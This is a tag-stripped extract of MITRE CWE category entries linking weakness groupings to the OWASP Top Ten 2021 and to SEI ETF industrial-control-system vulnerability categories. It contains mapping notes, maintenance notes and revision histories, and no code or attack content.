Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + As of CWE 4.6, the relationships in this category were pulled directly from the CWE mappings cited in the 2021 OWASP Top Ten. These mappings include categories, which are discouraged for mapping, as well as high-level weaknesses such as Pillars. The CWE Program will work with OWASP to improve these mappings, possibly requiring modifications to CWE itself. + + + + CWE Content Team + MITRE + 2021-10-05 + 4.6 + 2021-10-28 + + + CWE Content Team + MITRE + 2022-10-13 + updated References + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the A03 category "Injection" in the OWASP Top Ten 2021. + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + As of CWE 4.6, the relationships in this category were pulled directly from the CWE mappings cited in the 2021 OWASP Top Ten. These mappings include high-level Class and/or Pillar weaknesses. The CWE Program will work with OWASP to improve these mappings, possibly including modifications to CWE itself. + + + + CWE Content Team + MITRE + 2021-10-05 + 4.6 + 2021-10-28 + + + CWE Content Team + MITRE + 2022-10-13 + updated References + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the A04 "Insecure Design" category in the OWASP Top Ten 2021. + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + As of CWE 4.6, the relationships in this category were pulled directly from the CWE mappings cited in the 2021 OWASP Top Ten. These mappings include categories, which are discouraged for mapping, as well as high-level weaknesses such as Pillars. The CWE Program will work with OWASP to improve these mappings, possibly requiring modifications to CWE itself. + + + + CWE Content Team + MITRE + 2021-10-05 + 4.6 + 2021-10-28 + + + CWE Content Team + MITRE + 2022-10-13 + updated References + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the A05 category "Security Misconfiguration" in the OWASP Top Ten 2021. + + + + + + + + + + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + As of CWE 4.6, the relationships in this category were pulled directly from the CWE mappings cited in the 2021 OWASP Top Ten. These mappings include categories, which are discouraged for mapping. The CWE Program will work with OWASP to improve these mappings, possibly requiring modifications to CWE itself. + + + + CWE Content Team + MITRE + 2021-10-05 + 4.6 + 2021-10-28 + + + CWE Content Team + MITRE + 2022-10-13 + updated References + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the A06 category "Vulnerable and Outdated Components" in the OWASP Top Ten 2021. + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + As of CWE 4.6, the relationships in this category were pulled directly from the CWE mappings cited in the 2021 OWASP Top Ten. These mappings include categories, which are discouraged for mapping. The CWE Program will work with OWASP to improve these mappings, possibly requiring modifications to CWE itself. + + + + CWE Content Team + MITRE + 2021-10-05 + 4.6 + 2021-10-28 + + + CWE Content Team + MITRE + 2022-10-13 + updated References + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the A07 category "Identification and Authentication Failures" in the OWASP Top Ten 2021. + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + As of CWE 4.6, the relationships in this category were pulled directly from the CWE mappings cited in the 2021 OWASP Top Ten. These mappings include categories, which are discouraged for mapping, as well as high-level weaknesses. The CWE Program will work with OWASP to improve these mappings, possibly requiring modifications to CWE itself. + + + + CWE Content Team + MITRE + 2021-10-05 + 4.6 + 2021-10-28 + + + CWE Content Team + MITRE + 2022-10-13 + updated References + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the A08 category "Software and Data Integrity Failures" in the OWASP Top Ten 2021. + + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + As of CWE 4.6, the relationships in this category were pulled directly from the CWE mappings cited in the 2021 OWASP Top Ten. The CWE Program will work with OWASP to improve these mappings, possibly requiring modifications to CWE itself. + + + + CWE Content Team + MITRE + 2021-10-05 + 4.6 + 2021-10-28 + + + CWE Content Team + MITRE + 2022-10-13 + updated References + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the A09 category "Security Logging and Monitoring Failures" in the OWASP Top Ten 2021. + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + As of CWE 4.6, the relationships in this category were pulled directly from the CWE mappings cited in the 2021 OWASP Top Ten. The CWE Program will work with OWASP to improve these mappings, possibly requiring modifications to CWE itself. + + + + CWE Content Team + MITRE + 2021-10-05 + 4.6 + 2021-10-28 + + + CWE Content Team + MITRE + 2022-10-13 + updated References + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the A10 category "Server-Side Request Forgery (SSRF)" in the OWASP Top Ten 2021. + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + As of CWE 4.6, the relationships in this category were pulled directly from the CWE mappings cited in the 2021 OWASP Top Ten. The CWE Program will work with OWASP to improve these mappings, possibly requiring modifications to CWE itself. + + + + CWE Content Team + MITRE + 2021-10-05 + 4.6 + 2021-10-28 + + + CWE Content Team + MITRE + 2022-10-13 + updated References + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the "ICS Communications" super category from the SEI ETF "Categories of Security Vulnerabilities in ICS" as published in March 2022. + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + Relationships in this category are not authoritative and subject to change. See Maintenance notes. + This category was created in CWE 4.7 to facilitate and illuminate discussion about weaknesses in ICS with [REF-1248] as a starting point. After the release of CWE 4.9 in October 2022, this has been under active review by members of the "Boosting CWE" subgroup of the CWE-CAPEC ICS/OT Special Interest Group (SIG). Relationships are still subject to change. In addition, there may be some issues in [REF-1248] that are outside of the current scope of CWE, which will require consultation with many CWE stakeholders to resolve. + + + + New Categories of Security Vulnerabilities (NCSV) Technical Project Team (TPT) + Securing Energy Infrastructure Executive Task Force + 2022-03-09 + 4.7 + 2022-04-28 + + + CWE Content Team + MITRE + 2023-01-31 + updated Maintenance_Notes, Relationship_Notes + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are caused by improper data type transformation or improper handling of multiple data types. + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Community + 2006-07-19 + Draft 3 + 2006-07-19 + Submitted by members of the CWE community to extend early CWE versions + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the "ICS Dependencies (& Architecture)" super category from the SEI ETF "Categories of Security Vulnerabilities in ICS" as published in March 2022. + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + Relationships in this category are not authoritative and subject to change. See Maintenance notes. + This category was created in CWE 4.7 to facilitate and illuminate discussion about weaknesses in ICS with [REF-1248] as a starting point. After the release of CWE 4.9 in October 2022, this has been under active review by members of the "Boosting CWE" subgroup of the CWE-CAPEC ICS/OT Special Interest Group (SIG). Relationships are still subject to change. In addition, there may be some issues in [REF-1248] that are outside of the current scope of CWE, which will require consultation with many CWE stakeholders to resolve. + + + + New Categories of Security Vulnerabilities (NCSV) Technical Project Team (TPT) + Securing Energy Infrastructure Executive Task Force + 2022-03-09 + 4.7 + 2022-04-28 + + + CWE Content Team + MITRE + 2023-01-31 + updated Maintenance_Notes, Relationship_Notes + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the "ICS Supply Chain" super category from the SEI ETF "Categories of Security Vulnerabilities in ICS" as published in March 2022. + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + Relationships in this category are not authoritative and subject to change. See Maintenance notes. + This category was created in CWE 4.7 to facilitate and illuminate discussion about weaknesses in ICS with [REF-1248] as a starting point. After the release of CWE 4.9 in October 2022, this has been under active review by members of the "Boosting CWE" subgroup of the CWE-CAPEC ICS/OT Special Interest Group (SIG). Relationships are still subject to change. In addition, there may be some issues in [REF-1248] that are outside of the current scope of CWE, which will require consultation with many CWE stakeholders to resolve. + + + + New Categories of Security Vulnerabilities (NCSV) Technical Project Team (TPT) + Securing Energy Infrastructure Executive Task Force + 2022-03-09 + 4.7 + 2022-04-28 + + + CWE Content Team + MITRE + 2023-01-31 + updated Maintenance_Notes, Relationship_Notes + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the "ICS Engineering (Constructions/Deployment)" super category from the SEI ETF "Categories of Security Vulnerabilities in ICS" as published in March 2022. + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + Relationships in this category are not authoritative and subject to change. See Maintenance notes. + This category was created in CWE 4.7 to facilitate and illuminate discussion about weaknesses in ICS with [REF-1248] as a starting point. After the release of CWE 4.9 in October 2022, this has been under active review by members of the "Boosting CWE" subgroup of the CWE-CAPEC ICS/OT Special Interest Group (SIG). Relationships are still subject to change. In addition, there may be some issues in [REF-1248] that are outside of the current scope of CWE, which will require consultation with many CWE stakeholders to resolve. + + + + New Categories of Security Vulnerabilities (NCSV) Technical Project Team (TPT) + Securing Energy Infrastructure Executive Task Force + 2022-03-09 + 4.7 + 2022-04-28 + + + CWE Content Team + MITRE + 2023-01-31 + updated Maintenance_Notes, Relationship_Notes + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the "ICS Operations (& Maintenance)" super category from the SEI ETF "Categories of Security Vulnerabilities in ICS" as published in March 2022. + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + Relationships in this category are not authoritative and subject to change. See Maintenance notes. + This category was created in CWE 4.7 to facilitate and illuminate discussion about weaknesses in ICS with [REF-1248] as a starting point. After the release of CWE 4.9 in October 2022, this has been under active review by members of the "Boosting CWE" subgroup of the CWE-CAPEC ICS/OT Special Interest Group (SIG). Relationships are still subject to change. In addition, there may be some issues in [REF-1248] that are outside of the current scope of CWE, which will require consultation with many CWE stakeholders to resolve. + + + + New Categories of Security Vulnerabilities (NCSV) Technical Project Team (TPT) + Securing Energy Infrastructure Executive Task Force + 2022-03-09 + 4.7 + 2022-04-28 + + + CWE Content Team + MITRE + 2023-01-31 + updated Maintenance_Notes, Relationship_Notes + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the "Zone Boundary Failures" category from the SEI ETF "Categories of Security Vulnerabilities in ICS" as published in March 2022: "Within an ICS system, for traffic that crosses through network zone boundaries, vulnerabilities arise when those boundaries were designed for safety or other purposes but are being repurposed for security." Note: members of this category include "Nearest IT Neighbor" recommendations from the report, as well as suggestions by the CWE team. These relationships are likely to change in future CWE versions. + + + + + + + + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + Relationships in this category are not authoritative and subject to change. See Maintenance notes. + This category was created in CWE 4.7 to facilitate and illuminate discussion about weaknesses in ICS with [REF-1248] as a starting point. After the release of CWE 4.9 in October 2022, this has been under active review by members of the "Boosting CWE" subgroup of the CWE-CAPEC ICS/OT Special Interest Group (SIG). Relationships are still subject to change. In addition, there may be some issues in [REF-1248] that are outside of the current scope of CWE, which will require consultation with many CWE stakeholders to resolve. + + + + New Categories of Security Vulnerabilities (NCSV) Technical Project Team (TPT) + Securing Energy Infrastructure Executive Task Force + 2022-03-09 + 4.7 + 2022-04-28 + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Maintenance_Notes, Relationship_Notes + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes, Relationships + + + "Boosting CWE Content" Sub-Working Group + CWE-CAPEC ICS/OT SIG + 2023-04-26 + Suggested weaknesses to add to this category. + + + "Boosting CWE Content" Sub-Working Group + CWE-CAPEC ICS/OT SIG + 2023-06-29 + 4.12 + 2023-06-29 + Suggested weaknesses to add to this category. + + + + + Weaknesses in this category are related to the "Unreliability" category from the SEI ETF "Categories of Security Vulnerabilities in ICS" as published in March 2022: "Vulnerabilities arise in reaction to disruptions in the physical layer (e.g. creating electrical noise) used to carry the traffic." Note: members of this category include "Nearest IT Neighbor" recommendations from the report, as well as suggestions by the CWE team. These relationships are likely to change in future CWE versions. + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + Relationships in this category are not authoritative and subject to change. See Maintenance notes. + This category was created in CWE 4.7 to facilitate and illuminate discussion about weaknesses in ICS with [REF-1248] as a starting point. After the release of CWE 4.9 in October 2022, this has been under active review by members of the "Boosting CWE" subgroup of the CWE-CAPEC ICS/OT Special Interest Group (SIG). Relationships are still subject to change. In addition, there may be some issues in [REF-1248] that are outside of the current scope of CWE, which will require consultation with many CWE stakeholders to resolve. + + + + New Categories of Security Vulnerabilities (NCSV) Technical Project Team (TPT) + Securing Energy Infrastructure Executive Task Force + 2022-03-09 + 4.7 + 2022-04-28 + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Maintenance_Notes, Relationship_Notes + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes, Relationships + + + "Boosting CWE Content" Sub-Working Group + CWE-CAPEC ICS/OT SIG + 2023-04-26 + 4.11 + 2023-04-26 + Suggested weaknesses to add to this category. + + + "Boosting CWE Content" Sub-Working Group + CWE-CAPEC ICS/OT SIG + 2023-06-29 + 4.12 + 2023-06-29 + Suggested weaknesses to add to this category. + + + + + Weaknesses in this category are related to the "Frail Security in Protocols" category from the SEI ETF "Categories of Security Vulnerabilities in ICS" as published in March 2022: "Vulnerabilities arise as a result of mis-implementation or incomplete implementation of security in ICS implementations of communication protocols." Note: members of this category include "Nearest IT Neighbor" recommendations from the report, as well as suggestions by the CWE team. These relationships are likely to change in future CWE versions. + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + Relationships in this category are not authoritative and subject to change. See Maintenance notes. + This category was created in CWE 4.7 to facilitate and illuminate discussion about weaknesses in ICS with [REF-1248] as a starting point. After the release of CWE 4.9 in October 2022, this has been under active review by members of the "Boosting CWE" subgroup of the CWE-CAPEC ICS/OT Special Interest Group (SIG). Relationships are still subject to change. In addition, there may be some issues in [REF-1248] that are outside of the current scope of CWE, which will require consultation with many CWE stakeholders to resolve. + + + + New Categories of Security Vulnerabilities (NCSV) Technical Project Team (TPT) + Securing Energy Infrastructure Executive Task Force + 2022-03-09 + 4.7 + 2022-04-28 + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Maintenance_Notes, Relationship_Notes + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes, Relationships + + + "Boosting CWE Content" Sub-Working Group + CWE-CAPEC ICS/OT SIG + 2023-04-26 + 4.11 + 2023-04-26 + Suggested weaknesses to add to this category. + + + "Boosting CWE Content" Sub-Working Group + CWE-CAPEC ICS/OT SIG + 2023-06-29 + 4.12 + 2023-06-29 + Suggested weaknesses to add to this category. + + + + + Weaknesses in this category are related to the "External Physical Systems" category from the SEI ETF "Categories of Security Vulnerabilities in ICS" as published in March 2022: "Due to the highly interconnected technologies in use, an external dependency on another physical system could cause an availability interruption for the protected system." Note: members of this category include "Nearest IT Neighbor" recommendations from the report, as well as suggestions by the CWE team. These relationships are likely to change in future CWE versions. + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + Relationships in this category are not authoritative and subject to change. See Maintenance notes. + This category was created in CWE 4.7 to facilitate and illuminate discussion about weaknesses in ICS with [REF-1248] as a starting point. After the release of CWE 4.9 in October 2022, this has been under active review by members of the "Boosting CWE" subgroup of the CWE-CAPEC ICS/OT Special Interest Group (SIG). Relationships are still subject to change. In addition, there may be some issues in [REF-1248] that are outside of the current scope of CWE, which will require consultation with many CWE stakeholders to resolve. + + + + New Categories of Security Vulnerabilities (NCSV) Technical Project Team (TPT) + Securing Energy Infrastructure Executive Task Force + 2022-03-09 + 4.7 + 2022-04-28 + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Maintenance_Notes, Relationship_Notes, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + "Boosting CWE Content" Sub-Working Group + CWE-CAPEC ICS/OT SIG + 2023-01-24 + Suggested weaknesses to add to this category. + + + + + Weaknesses in this category are related to the "External Digital Systems" category from the SEI ETF "Categories of Security Vulnerabilities in ICS" as published in March 2022: "Due to the highly interconnected technologies in use, an external dependency on another digital system could cause a confidentiality, integrity, or availability incident for the protected system." Note: members of this category include "Nearest IT Neighbor" recommendations from the report, as well as suggestions by the CWE team. These relationships are likely to change in future CWE versions. + + + + + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + Relationships in this category are not authoritative and subject to change. See Maintenance notes. + This category was created in CWE 4.7 to facilitate and illuminate discussion about weaknesses in ICS with [REF-1248] as a starting point. After the release of CWE 4.9 in October 2022, this has been under active review by members of the "Boosting CWE" subgroup of the CWE-CAPEC ICS/OT Special Interest Group (SIG). Relationships are still subject to change. In addition, there may be some issues in [REF-1248] that are outside of the current scope of CWE, which will require consultation with many CWE stakeholders to resolve. + + + + New Categories of Security Vulnerabilities (NCSV) Technical Project Team (TPT) + Securing Energy Infrastructure Executive Task Force + 2022-03-09 + 4.7 + 2022-04-28 + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Maintenance_Notes, Relationship_Notes, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes, Relationships + + + "Boosting CWE Content" Sub-Working Group + CWE-CAPEC ICS/OT SIG + 2023-01-24 + 4.10 + 2023-01-24 + Suggested weaknesses to add to this category. + + + "Boosting CWE Content" Sub-Working Group + CWE-CAPEC ICS/OT SIG + 2023-06-29 + 4.12 + 2023-06-29 + Suggested weaknesses to add to this category. + + + + + Weaknesses in this category are related to the "IT/OT Convergence/Expansion" category from the SEI ETF "Categories of Security Vulnerabilities in ICS" as published in March 2022: "The increased penetration of DER devices and smart loads make emerging ICS networks more like IT networks and thus susceptible to vulnerabilities similar to those of IT networks." Note: members of this category include "Nearest IT Neighbor" recommendations from the report, as well as suggestions by the CWE team. These relationships are likely to change in future CWE versions. + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + Relationships in this category are not authoritative and subject to change. See Maintenance notes. + This category might be subject to CWE Scope Exclusion SCOPE.SITUATIONS (Focus on situations in which weaknesses may appear). + This category was created in CWE 4.7 to facilitate and illuminate discussion about weaknesses in ICS with [REF-1248] as a starting point. After the release of CWE 4.9 in October 2022, this has been under active review by members of the "Boosting CWE" subgroup of the CWE-CAPEC ICS/OT Special Interest Group (SIG). Relationships are still subject to change. In addition, there may be some issues in [REF-1248] that are outside of the current scope of CWE, which will require consultation with many CWE stakeholders to resolve. + + + + New Categories of Security Vulnerabilities (NCSV) Technical Project Team (TPT) + Securing Energy Infrastructure Executive Task Force + 2022-03-09 + 4.7 + 2022-04-28 + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Maintenance_Notes, Relationship_Notes, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + "Boosting CWE Content" Sub-Working Group + CWE-CAPEC ICS/OT SIG + 2023-01-24 + Suggested weaknesses to add to this category. + + + + + Weaknesses in this category are related to the creation or neutralization of data using an incorrect format. + + + + + + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Community + 2006-07-19 + Draft 3 + 2006-07-19 + Submitted by members of the CWE community to extend early CWE versions + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Description, Name, Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Name, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Representation Errors + Data Representation Errors + + + + Weaknesses in this category are related to the "Common Mode Frailties" category from the SEI ETF "Categories of Security Vulnerabilities in ICS" as published in March 2022: "At the component level, most ICS systems are assembled from common parts made by other companies. One or more of these common parts might contain a vulnerability that could result in a wide-spread incident." Note: members of this category include "Nearest IT Neighbor" recommendations from the report, as well as suggestions by the CWE team. These relationships are likely to change in future CWE versions. + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + Relationships in this category are not authoritative and subject to change. See Maintenance notes. + This category was created in CWE 4.7 to facilitate and illuminate discussion about weaknesses in ICS with [REF-1248] as a starting point. After the release of CWE 4.9 in October 2022, this has been under active review by members of the "Boosting CWE" subgroup of the CWE-CAPEC ICS/OT Special Interest Group (SIG). Relationships are still subject to change. In addition, there may be some issues in [REF-1248] that are outside of the current scope of CWE, which will require consultation with many CWE stakeholders to resolve. + + + + New Categories of Security Vulnerabilities (NCSV) Technical Project Team (TPT) + Securing Energy Infrastructure Executive Task Force + 2022-03-09 + 4.7 + 2022-04-28 + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Maintenance_Notes, Relationship_Notes, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + "Boosting CWE Content" Sub-Working Group + CWE-CAPEC ICS/OT SIG + 2023-01-24 + Suggested weaknesses to add to this category. + + + "Boosting CWE Content" Sub-Working Group + CWE-CAPEC ICS/OT SIG + 2023-04-26 + Suggested weaknesses to add to this category. + + + + + Weaknesses in this category are related to the "Poorly Documented or Undocumented Features" category from the SEI ETF "Categories of Security Vulnerabilities in ICS" as published in March 2022: "Undocumented capabilities and configurations pose a risk by not having a clear understanding of what the device is specifically supposed to do and only do. Therefore possibly opening up the attack surface and vulnerabilities." Note: members of this category include "Nearest IT Neighbor" recommendations from the report, as well as suggestions by the CWE team. These relationships are likely to change in future CWE versions. + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + Relationships in this category are not authoritative and subject to change. See Maintenance notes. + This category was created in CWE 4.7 to facilitate and illuminate discussion about weaknesses in ICS with [REF-1248] as a starting point. After the release of CWE 4.9 in October 2022, this has been under active review by members of the "Boosting CWE" subgroup of the CWE-CAPEC ICS/OT Special Interest Group (SIG). Relationships are still subject to change. In addition, there may be some issues in [REF-1248] that are outside of the current scope of CWE, which will require consultation with many CWE stakeholders to resolve. + + + + New Categories of Security Vulnerabilities (NCSV) Technical Project Team (TPT) + Securing Energy Infrastructure Executive Task Force + 2022-03-09 + 4.7 + 2022-04-28 + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Maintenance_Notes, Relationship_Notes, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + "Boosting CWE Content" Sub-Working Group + CWE-CAPEC ICS/OT SIG + 2023-01-24 + Suggested weaknesses to add to this category. + + + + + Weaknesses in this category are related to the "OT Counterfeit and Malicious Corruption" category from the SEI ETF "Categories of Security Vulnerabilities in ICS" as published in March 2022: "In ICS, when this procurement process results in a vulnerability or component damage, it can have grid impacts or cause physical harm." Note: members of this category include "Nearest IT Neighbor" recommendations from the report, as well as suggestions by the CWE team. These relationships are likely to change in future CWE versions. + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + Relationships in this category are not authoritative and subject to change. See Maintenance notes. + This category might be subject to CWE Scope Exclusion SCOPE.HUMANPROC (Human/organizational process). + This category was created in CWE 4.7 to facilitate and illuminate discussion about weaknesses in ICS with [REF-1248] as a starting point. After the release of CWE 4.9 in October 2022, this has been under active review by members of the "Boosting CWE" subgroup of the CWE-CAPEC ICS/OT Special Interest Group (SIG). Relationships are still subject to change. In addition, there may be some issues in [REF-1248] that are outside of the current scope of CWE, which will require consultation with many CWE stakeholders to resolve. + + + + New Categories of Security Vulnerabilities (NCSV) Technical Project Team (TPT) + Securing Energy Infrastructure Executive Task Force + 